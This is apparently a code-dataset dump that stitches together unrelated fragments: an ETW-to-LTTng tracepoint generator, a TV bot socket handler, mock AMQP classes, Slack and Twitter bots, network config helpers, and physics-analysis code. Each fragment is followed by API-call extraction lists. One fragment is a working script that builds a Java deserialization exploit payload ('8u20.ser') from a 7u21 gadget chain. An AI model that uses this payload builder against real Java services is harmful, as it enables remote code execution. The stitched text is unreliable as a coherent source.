headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
continue
headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
headerLines.append("#include <lttng/tracepoint-event.h>")
return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
# Convert from ETW's windows types to LTTng compatiable types
methodBody = [""]
functionSignature = template.signature
if not shouldPackTemplate(template):
invocation = ["do_tracepoint(" + providerName, eventName]
for paramName in functionSignature.paramList:
functionParam = functionSignature.getParam(paramName)
wintypeName = functionParam.winType
winCount = functionParam.count
ctf_type = None
if functionParam.outType:
ctf_type = ctfDataTypeMapping.get(functionParam.outType)
else:
ctf_Type = ctfDataTypeMapping.get(winCount)
if not ctf_type:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
# Convert wchar unicode string to utf8
if functionParam.length:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
else:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
invocation.append(paramName + "_converter")
# elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer":
elif wintypeName == "win:Pointer":
invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
else:
invocation.append(paramName)
methodBody.append(",\n ".join(invocation) + ");")
else:
# Packing results into buffer
methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
methodBody.append("char *buffer = stackBuffer;")
methodBody.append("int offset = 0;")
methodBody.append("int size = " + str(template.estimatedSize) + ";")
methodBody.append("bool fixedBuffer = true;")
methodBody.append("bool success = true;")
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
if paramName in template.structCounts:
size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif paramName in template.arrayCounts:
size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif functionParameter.winType == "win:GUID":
methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
else:
methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
methodBody.append("if (!success)")
methodBody.append("{")
methodBody.append(" if (!fixedBuffer) delete[] buffer;")
methodBody.append(" return ERROR_WRITE_FAULT;")
methodBody.append("}")
methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
methodBody.append("if (!fixedBuffer) delete[] buffer;")
return "\n ".join(methodBody) + "\n"
def generateMethodSignature(template):
if not template:
return ""
functionSignature = template.signature
lineFunctionPrototype = []
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
wintypeName = functionParameter.winType
mappedType = palDataTypeMapping[wintypeName]
winCount = functionParameter.count
mappedCount = palDataTypeMapping[winCount]
if paramName in template.structCounts:
lineFunctionPrototype.append(" int " + paramName + "_ElementSize")
# lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length))
lineFunctionPrototype.append(
" " + mappedType
+ (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "")
+ " "
+ functionParameter.name)
return ",\n".join(lineFunctionPrototype)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
providerLines = [];
providerLines.append("#define TRACEPOINT_DEFINE")
providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
providerLines.append("#endif")
providerLines.append("#include \"stdlib.h\"")
providerLines.append("#include \"Common.h\"")
providerLines.append("#include \"Codex/Utf8Helper.h\"")
providerLines.append("#include \"" + lttngHeader + "\"\n\n")
providerLines.append("#ifndef tracepoint_enabled")
providerLines.append("#define tracepoint_enabled(provider, name) 1")
providerLines.append("#define do_tracepoint tracepoint")
providerLines.append("#endif")
providerLines.append("""
bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
{
newSize *= 1.5;
_ASSERTE(newSize > size); // Check for overflow
if (newSize < 32)
{
newSize = 32;
}
char *newBuffer = new char[newSize];
memcpy(newBuffer, buffer, currentLength);
if (!fixedBuffer)
{
delete[] buffer;
}
buffer = newBuffer;
size = newSize;
fixedBuffer = false;
return true;
}
bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
{
if (!src)
{
return true;
}
if (offset + len > size)
{
if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
{
return false;
}
}
memcpy(buffer + offset, src, len);
offset += len;
return true;
}
template <typename T>
bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
{
if (sizeof(T) + offset > size)
{
if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
{
return false;
}
}
*(T *)(buffer + offset) = value;
offset += sizeof(T);
return true;
}
""")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
% (eventName, providerName, eventName))
providerLines.append("")
template = None
if templateName:
template = templates[templateName]
providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
providerLines.append(generateMethodSignature(template))
providerLines.append(")")
providerLines.append("{")
providerLines.append(" if (!EventXplatEnabled" + eventName + "())")
providerLines.append(" return ERROR_SUCCESS;")
if template:
providerLines.append(generateMethodBody(template, providerName, eventName))
else:
providerLines.append(" do_tracepoint(" + providerName + ", " + eventName +");")
providerLines.append("")
providerLines.append(" return ERROR_SUCCESS;")
providerLines.append("}")
providerLines.append("")
return "\n".join(providerLines)
def generateEtwHeader(templates, events):
headerLines = []
headerLines.append("#include \"pal.h\"")
headerLines.append("")
for event in events:
eventName = event.getAttribute('symbol')
templateName = event.getAttribute('template')
template = None
if templateName:
template = templates[templateName]
callArgs = []
if template:
functionSignature = template.signature
for param in functionSignature.paramList:
if param in template.structCounts:
callArgs.append(param + "_ElementSize")
callArgs.append(param)
headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
headerLines.append("")
headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
headerLines.append(generateMethodSignature(template))
headerLines.append(");")
headerLines.append("inline unsigned long EventWrite" + eventName + "(")
headerLines.append(generateMethodSignature(template))
headerLines.append(")")
headerLines.append("{")
headerLines.append(" return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
headerLines.append("}")
headerLines.append("")
return "\n".join(headerLines)
def generateCmakeFile(providerName):
cmakeLines = []
cmakeLines.append("project(Chakra.LTTng)")
cmakeLines.append("")
cmakeLines.append("add_compile_options(-fPIC)")
cmakeLines.append("")
cmakeLines.append("add_library (Chakra.LTTng OBJECT")
cmakeLines.append(" eventprovider" + providerName + ".cpp")
cmakeLines.append(" tracepointprovider" + providerName + ".cpp")
cmakeLines.append(")")
return "\n".join(cmakeLines)
def generateLttngFiles(manifest, providerDirectory):
import os
tree = DOM.parse(manifest)
if not os.path.exists(providerDirectory):
os.makedirs(providerDirectory)
if not os.path.exists(providerDirectory + "/lttng"):
os.makedirs(providerDirectory + "/lttng")
for providerNode in tree.getElementsByTagName("provider"):
providerName = providerNode.getAttribute("name")
providerName = providerName.replace("Microsoft-", "")
providerNameFile = providerName.lower()
lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
lttngHeader = open(lttngEventHeaderPath, "w")
lttngImplementation = open(lttngEventProvider, "w")
lttngTraceImplementation = open(lttngEventProviderTrace, "w")
lttngEtwHeader = open(lttngEtwHeaderFile, "w")
lttngCmake = open(lttngCmakeFile, "w")
# Create the lttng implementation
lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")
lttngTraceImplementation.close()
# Create the lttng header
templateNodes = providerNode.getElementsByTagName('template')
eventNodes = providerNode.getElementsByTagName('event')
allTemplates = parseTemplateNodes(templateNodes)
lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngHeader.close();
lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngImplementation.close();
lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
lttngEtwHeader.close()
# Note: This in particular assumes that there is only one ETW provider
lttngCmake.write(generateCmakeFile(providerNameFile))
lttngCmake.close()
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")
required = parser.add_argument_group('required arguments')
required.add_argument('--man', type=str, required=True,
help='full path to manifest containig the description of events')
required.add_argument('--intermediate', type=str, required=True,
help='full path to eventprovider intermediate directory')
args, unknown = parser.parse_known_args(sys.argv[1:])
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
sys.exit(1)
generateLttngFiles(args.man, args.intermediate)
sys.exit(0)
| [
"os.path.exists",
"xml.dom.minidom.parse",
"os.makedirs",
"argparse.ArgumentParser",
"sys.exit"
] | [((26281, 26300), 'xml.dom.minidom.parse', 'DOM.parse', (['manifest'], {}), '(manifest)\n', (26290, 26300), True, 'import xml.dom.minidom as DOM\n'), ((28758, 28868), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generates the Code required to instrument LTTtng logging mechanism"""'}), "(description=\n 'Generates the Code required to instrument LTTtng logging mechanism')\n", (28781, 28868), False, 'import argparse\n'), ((29464, 29475), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (29472, 29475), False, 'import sys\n'), ((26313, 26346), 'os.path.exists', 'os.path.exists', (['providerDirectory'], {}), '(providerDirectory)\n', (26327, 26346), False, 'import os\n'), ((26356, 26386), 'os.makedirs', 'os.makedirs', (['providerDirectory'], {}), '(providerDirectory)\n', (26367, 26386), False, 'import os\n'), ((26399, 26443), 'os.path.exists', 'os.path.exists', (["(providerDirectory + '/lttng')"], {}), "(providerDirectory + '/lttng')\n", (26413, 26443), False, 'import os\n'), ((26453, 26494), 'os.makedirs', 'os.makedirs', (["(providerDirectory + '/lttng')"], {}), "(providerDirectory + '/lttng')\n", (26464, 26494), False, 'import os\n'), ((29395, 29406), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (29403, 29406), False, 'import sys\n')] |
"""
Handles all requests that coming from phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
"""
Handles the tcp socket connection
"""
def handle(self):
self.bot = TVBot()
while True:
self.data = self.rfile.readline()
if not self.data:
break
self.data = self.data.decode()
if "STAR" in self.data.upper():
self.bot.open(bot.TV_STAR)
elif "ATV" in self.data.upper():
self.bot.open(bot.TV_ATV)
elif "KANAL D" in self.data.upper() or "KANALD" in self.data.upper():
self.bot.open(bot.TV_KANALD)
elif "TRT" in self.data.upper():
self.bot.open(bot.TV_TRT)
elif "FOX" in self.data.upper():
self.bot.open(bot.TV_FOX)
elif "SHOW TV" in self.data.upper() or "SHOW" in self.data.upper():
self.bot.open(bot.TV_SHOW)
elif "TV2" in self.data.upper() or "TV 2" in self.data.upper():
self.bot.open(bot.TV_TV2)
elif "KAPAT" in self.data.upper() or "CLOSE" in self.data.upper():
self.bot.close()
self.bot.close()
| [
"bot.TVBot"
] | [((268, 275), 'bot.TVBot', 'TVBot', ([], {}), '()\n', (273, 275), False, 'from bot import TVBot\n')] |
import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# 第一步,向HashSet添加一个假字段,名字fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
# 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler
# 读取BeanContextSupportClass的类的简介
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
# 向beanContextSupportObject添加beanContextChildPeer属性
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
# 向beanContextSupportObject添加serializable属性
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
# 向beanContextSupportObject添加objectAnnontations 数据
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
# 把beanContextSupportObject对象添加到fake属性里
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
| [
"javaSerializationTools.JavaEndBlock",
"javaSerializationTools.JavaString",
"javaSerializationTools.ObjectRead",
"javaSerializationTools.JavaObject",
"javaSerializationTools.JavaField",
"javaSerializationTools.ObjectWrite"
] | [((277, 290), 'javaSerializationTools.ObjectRead', 'ObjectRead', (['f'], {}), '(f)\n', (287, 290), False, 'from javaSerializationTools import ObjectRead\n'), ((379, 436), 'javaSerializationTools.JavaString', 'JavaString', (['"""Ljava/beans/beancontext/BeanContextSupport;"""'], {}), "('Ljava/beans/beancontext/BeanContextSupport;')\n", (389, 436), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((929, 968), 'javaSerializationTools.JavaObject', 'JavaObject', (['BeanContextSupportClassDesc'], {}), '(BeanContextSupportClassDesc)\n', (939, 968), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1370, 1403), 'javaSerializationTools.JavaField', 'JavaField', (['"""serializable"""', '"""I"""', '(1)'], {}), "('serializable', 'I', 1)\n", (1379, 1403), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1841, 1912), 'javaSerializationTools.JavaField', 'JavaField', (['"""fake"""', "fakeSignature['signature']", 'beanContextSupportObject'], {}), "('fake', fakeSignature['signature'], beanContextSupportObject)\n", (1850, 1912), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((2005, 2019), 'javaSerializationTools.ObjectWrite', 'ObjectWrite', (['f'], {}), '(f)\n', (2016, 2019), False, 'from javaSerializationTools import ObjectWrite\n'), ((1085, 1139), 'javaSerializationTools.JavaString', 'JavaString', (['"""Ljava/beans/beancontext/BeanContextChild"""'], {}), "('Ljava/beans/beancontext/BeanContextChild')\n", (1095, 1139), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1589, 1603), 'javaSerializationTools.JavaEndBlock', 'JavaEndBlock', ([], {}), '()\n', (1601, 1603), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n')] |
import asyncio
import uuid
class MockChannel:
def __init__(self):
self.published = []
self.acked = []
self.nacked = []
async def publish(self, *args, **kwargs):
self.published.append({"args": args, "kwargs": kwargs})
async def basic_client_ack(self, *args, **kwargs):
self.acked.append({"args": args, "kwargs": kwargs})
async def basic_client_nack(self, *args, **kwargs):
self.nacked.append({"args": args, "kwargs": kwargs})
class MockEnvelope:
def __init__(self, uid):
self.delivery_tag = uid
class MockAMQPChannel:
def __init__(self, protocol):
self.protocol = protocol
self.consumers = []
self.closed = False
self.unacked_messages = []
async def basic_qos(self, *args, **kwargs):
pass
async def exchange_declare(self, *args, **kwargs):
pass
async def queue_declare(self, queue_name, *args, **kwargs):
if queue_name not in self.protocol.queues:
self.protocol.queues[queue_name] = []
if "arguments" in kwargs:
arguments = kwargs["arguments"]
if "x-dead-letter-routing-key" in arguments:
self.protocol.dead_mapping[queue_name] = arguments[
"x-dead-letter-routing-key"
]
async def queue_bind(self, *args, **kwargs):
pass
async def _basic_consume(self, handler, queue_name):
while not self.closed:
await asyncio.sleep(0.02)
if queue_name not in self.protocol.queues:
continue
else:
messages = self.protocol.queues[queue_name]
self.protocol.queues[queue_name] = []
self.unacked_messages.extend(messages)
for message in messages:
await handler(
self,
message["message"],
MockEnvelope(message["id"]),
message["properties"],
)
async def basic_client_ack(self, delivery_tag):
for message in self.unacked_messages[:]:
if delivery_tag == message["id"]:
self.unacked_messages.remove(message)
return message
async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
message = await self.basic_client_ack(delivery_tag)
if message:
if requeue:
# put back on same queue
self.protocol.queues[message["queue"]].append(message)
else:
new_queue = self.protocol.dead_mapping[message["queue"]]
self.protocol.queues[new_queue].append(message)
async def basic_consume(self, handler, queue_name):
self.consumers.append(
asyncio.ensure_future(self._basic_consume(handler, queue_name))
)
async def publish(
self, message, exchange_name=None, routing_key=None, properties={}
):
if routing_key not in self.protocol.queues:
self.protocol.queues[routing_key] = []
self.protocol.queues[routing_key].append(
{
"id": str(uuid.uuid4()),
"message": message,
"properties": properties,
"queue": routing_key,
}
)
async def close(self):
self.closed = True
await asyncio.sleep(0.06)
class MockAMQPTransport:
def __init__(self):
pass
def close(self):
pass
class MockAMQPProtocol:
def __init__(self):
self.queues = {}
self.dead_mapping = {}
self.closed = False
self.channels = []
async def channel(self):
channel = MockAMQPChannel(self)
self.channels.append(channel)
return channel
async def wait_closed(self):
while not self.closed:
await asyncio.sleep(0.05)
raise GeneratorExit()
async def close(self):
self.closed = True
for channel in self.channels:
await channel.close()
async def send_heartbeat(self):
pass
async def amqp_connection_factory(*args, **kwargs):
return MockAMQPTransport(), MockAMQPProtocol()
| [
"uuid.uuid4",
"asyncio.sleep"
] | [((3441, 3460), 'asyncio.sleep', 'asyncio.sleep', (['(0.06)'], {}), '(0.06)\n', (3454, 3460), False, 'import asyncio\n'), ((1496, 1515), 'asyncio.sleep', 'asyncio.sleep', (['(0.02)'], {}), '(0.02)\n', (1509, 1515), False, 'import asyncio\n'), ((3935, 3954), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (3948, 3954), False, 'import asyncio\n'), ((3217, 3229), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3227, 3229), False, 'import uuid\n')] |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^bot/', views.webhook, name='bot'),
url(r'^foodcenter/', views.food_center_webhook, name= 'food'),
# url(r'^relay/', vi)
] | [
"django.conf.urls.url"
] | [((74, 113), 'django.conf.urls.url', 'url', (['"""^bot/"""', 'views.webhook'], {'name': '"""bot"""'}), "('^bot/', views.webhook, name='bot')\n", (77, 113), False, 'from django.conf.urls import url\n'), ((120, 179), 'django.conf.urls.url', 'url', (['"""^foodcenter/"""', 'views.food_center_webhook'], {'name': '"""food"""'}), "('^foodcenter/', views.food_center_webhook, name='food')\n", (123, 179), False, 'from django.conf.urls import url\n')] |
"""Common configure functions for bgp"""
# Python
import logging
import re
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_l2vpn_storm_control(
device, interface, service_instance_id, storm_control
):
""" Configures storm control under service instance
Args:
device('obj'): device to configure
interface('str'): interface name
service_instance_id:('int'): service instance id
storm_control('list'): list of storm control configurations
ex.)
[
{
'traffic_flow': 'unicast',
'name': 'cir',
'val': 8000
},
{
'traffic_flow': 'broadcast',
'name': 'cir',
'val': 8000
},
{
'traffic_flow': 'multicast',
'name': 'cir',
'val': 8000
}
]
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Configuring storm control under service "
"instance: {} and interface: {}".format(service_instance_id, interface)
)
config = []
config.append("interface {}\n".format(interface))
config.append("service instance {} ethernet\n".format(service_instance_id))
for sc in storm_control:
traffic_flow = sc["traffic_flow"]
name = sc["name"]
val = sc["val"]
config.append(
"storm-control {} {} {}\n".format(traffic_flow, name, val)
)
try:
device.configure("".join(config))
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration failed for storm control under service "
"instance: {} and interface: {} with exception: {}".format(
service_instance_id, interface, str(e)
)
)
def configure_l2vpn_vfi_context_vpls(device, vpn_id, pseudowire=None):
"""
Configures l2vpn vfi context vpls on device
Args:
device('obj'): device to configure
vpn_id('str'): vpn_id to configure
pseudowire('str', optional): pseudowire to configure,
default value is None
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Configuring l2vpn vfi context vpls on {dev}".format(dev=device.name)
)
config = [
"l2vpn vfi context vpls",
"vpn id {vpn}".format(vpn=vpn_id)
]
if pseudowire:
for attr in pseudowire:
config.append("member {attr}".format(attr=attr))
try:
device.configure(config)
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration failed for l2vpn vfi vpls on "
"{dev} with exception: {e}".format(
dev=device.name, e=str(e)
)
)
def unconfigure_l2vpn_vfi_context_vpls(device):
"""
Unconfigures l2vpn vfi context vpls on device
Args:
device('obj'): device to configure
Returns:
N/A
Raises:
SubCommandFailure
"""
log.info(
"Unconfiguring l2vpn vfi context vpls on {dev}".format(dev=device.name)
)
try:
device.configure("no l2vpn vfi context vpls")
except SubCommandFailure as e:
raise SubCommandFailure(
"Configuration removal failed for l2vpn vfi vpls on "
"{dev} with exception: {e}".format(
dev=device.name, e=str(e)
)
)
| [
"logging.getLogger"
] | [((142, 169), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (159, 169), False, 'import logging\n')] |
from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
return f"HELLO WORLD! user {kwargs['name']}, {kwargs['display_name']}"
if __name__ == '__main__':
print('Magi Start!')
print('='*30)
print('MagiModule Initializing.')
module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
print('Complete')
print('='*30)
print('MagiIO Initializing.')
io = MagiIO.MagiIO(module)
print('Complete')
print('='*30)
io.set_callback_func('hello', hello_world)
io.start()
| [
"MagiSlack.module.MagiModule.MagiModule",
"MagiSlack.io.MagiIO.MagiIO"
] | [((330, 379), 'MagiSlack.module.MagiModule.MagiModule', 'MagiModule.MagiModule', (["environ['SLACK_API_TOKEN']"], {}), "(environ['SLACK_API_TOKEN'])\n", (351, 379), False, 'from MagiSlack.module import MagiModule\n'), ((464, 485), 'MagiSlack.io.MagiIO.MagiIO', 'MagiIO.MagiIO', (['module'], {}), '(module)\n', (477, 485), False, 'from MagiSlack.io import MagiIO\n')] |
def get_dosages(connection):
cursor = connection.cursor()
query = ("SELECT * from dosage")
cursor.execute(query)
response = []
for (dosage_id, dosage_name) in cursor:
response.append({
'dosage_id': dosage_id,
'dosage_name': dosage_name
})
return response
if __name__ == '__main__':
from sql_connection import get_sql_connection
connection = get_sql_connection()
print(get_dosages(connection))
| [
"sql_connection.get_sql_connection"
] | [((434, 454), 'sql_connection.get_sql_connection', 'get_sql_connection', ([], {}), '()\n', (452, 454), False, 'from sql_connection import get_sql_connection\n')] |
import jtweeter
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 000000000 #user id of twitter user to simulate.
def main():
jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
main() | [
"jtweeter.tweet"
] | [((289, 382), 'jtweeter.tweet', 'jtweeter.tweet', (['access_token', 'access_token_secret', 'consumer_key', 'consumer_secret', 'user_id'], {}), '(access_token, access_token_secret, consumer_key,\n consumer_secret, user_id)\n', (303, 382), False, 'import jtweeter\n')] |
import pickle
import numpy as np
def fetch_file(path):
with open(path, 'rb') as fp:
return pickle.load(fp)
def fetch_adj_mat(column):
if column == 0:
return A1
elif column == 1:
return A2
elif column == 2:
return A3
# elif column == 3:
# return A4
print("Fetching files...")
A1 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A2 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A3 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
# A4 = np.array(fetch_file(RELATIVE_PATH + ADJACENCY_MATRIX + "A4_fc.txt"))
influence_matrix = np.array(fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/influence_matrix_normal/definition_2/"
"influence_matrix_fc.txt"))
print(influence_matrix.shape)
krp = []
for i in range(3):
wa1 = A1 * influence_matrix[i][0]
wa2 = A2 * influence_matrix[i][1]
wa3 = A3 * influence_matrix[i][2]
# wa4 = A4 * influence_matrix_normal[i][3]
print(influence_matrix[i][0])
print(influence_matrix[i][1])
print(influence_matrix[i][2])
# print(influence_matrix_normal[i][3])
for j in range(1134):
row = []
row.extend(wa1[j])
row.extend(wa2[j])
row.extend(wa3[j])
# row.extend(wa4[j])
krp.append(row)
print("Clearing variables...")
A1 = None
A2 = None
A3 = None
# A4 = None
influence_matrix = None
print("Setting up kr_product...")
kr_product = np.array(krp, dtype=np.float)
krp.clear()
print(kr_product.shape)
print(kr_product)
print("Calculating eigenvector...")
e = np.linalg.eig(kr_product)
e_val = e[0]
e_vec = e[1]
ind = list(e_val).index(max(e_val))
print(ind)
pev = e_vec[ind] / np.linalg.norm(e_vec[ind])
print(pev.shape)
print(pev)
print(sum(map(lambda x: x.real * x.real, pev)))
print("Saving eigenvector...")
with open("global_eigenvector_fc.txt", 'wb') as fp:
pickle.dump(pev, fp)
print("Saving eigenvalues...")
with open("eigenvalue_" + str(ind) + "_fc.txt", "wb") as fp:
pickle.dump(e_val[ind], fp)
print("Process finished!")
| [
"pickle.dump",
"numpy.linalg.eig",
"pickle.load",
"numpy.array",
"numpy.linalg.norm"
] | [((1745, 1774), 'numpy.array', 'np.array', (['krp'], {'dtype': 'np.float'}), '(krp, dtype=np.float)\n', (1753, 1774), True, 'import numpy as np\n'), ((1871, 1896), 'numpy.linalg.eig', 'np.linalg.eig', (['kr_product'], {}), '(kr_product)\n', (1884, 1896), True, 'import numpy as np\n'), ((1992, 2018), 'numpy.linalg.norm', 'np.linalg.norm', (['e_vec[ind]'], {}), '(e_vec[ind])\n', (2006, 2018), True, 'import numpy as np\n'), ((2185, 2205), 'pickle.dump', 'pickle.dump', (['pev', 'fp'], {}), '(pev, fp)\n', (2196, 2205), False, 'import pickle\n'), ((2303, 2330), 'pickle.dump', 'pickle.dump', (['e_val[ind]', 'fp'], {}), '(e_val[ind], fp)\n', (2314, 2330), False, 'import pickle\n'), ((105, 120), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (116, 120), False, 'import pickle\n')] |
"""
Module comparison superimposes most probable local density, maximum
cooperativity, time of maximum cooperativity and ratio of transversal and
longitudinal correlations at time of maximum cooperativity, as functions of
the Péclet number, for different trajectories in the phase diagram (either
varying persistence time at fixed self-propelling velocity or varying
self-propelling velocity at fixed persistence time).
Simulation directories must follow the active_particles.naming.AHB2D naming
standard and input files in simulation directories must follow the
active_particles.naming.VarN standard (local densities) and either the
active_particles.naming.Cuu standard (for cooperativities from displacement
correlations), or active_particles.naming.Cww standard (for cooperativities
from displacement relative to centre of mass displacement correlations), or
active_particles.naming.Cdd standard (for cooperativities from displacement
norm correlations), or active_particles.naming.Cee (for cooperativities from
displacement direction correlations).
Environment modes
-----------------
CORRELATION : string
Correlations from which to calculate cooperativities and extract
longitudinal and transversal components.
_____________________________________________________________
| Mode | Correlations |
|______|______________________________________________________|
| Cuu | displacement |
|______|______________________________________________________|
| Cww | displacement relative to centre of mass displacement |
|______|______________________________________________________|
| Cdd | displacement norm |
|______|______________________________________________________|
| Cee | displacement direction |
|______|______________________________________________________|
DEFAULT: Cuu
DRDT : bool
Use the product of the rotation diffusion constant and lag time rather
than the bare lag time.
DEFAULT: True
SHOW : bool
Show comparison plot.
DEFAULT: True
Environment parameters
----------------------
DATA_DIRECTORY : string
Data directory.
DEFAULT: active_particles.naming.sim_directory
EXCLUDE : string
Simulation directories in DATA_DIRECTORY to exclude from the plots.
DEFAULT:
PARAMETERS_FILE : string
Simulation parameters file name.
DEFAULT: active_particles.naming.parameters_file
IMAGE_NAME : string
Default image file name.
DEFAULT: active_particles.plot.comparison._image_name
N : int
Number of particles.
DEFAULT: active_particles.plot.comparison._N
VARIABLES (mandatory) : string separated by ':'
Trajectory variable in order of trajectory.
_______________________________________
| Mode | Variable |
|_________|_____________________________|
| 'dr' | Rotation diffusion constant |
|_________|_____________________________|
| 'vzero' | self-propelling velocity |
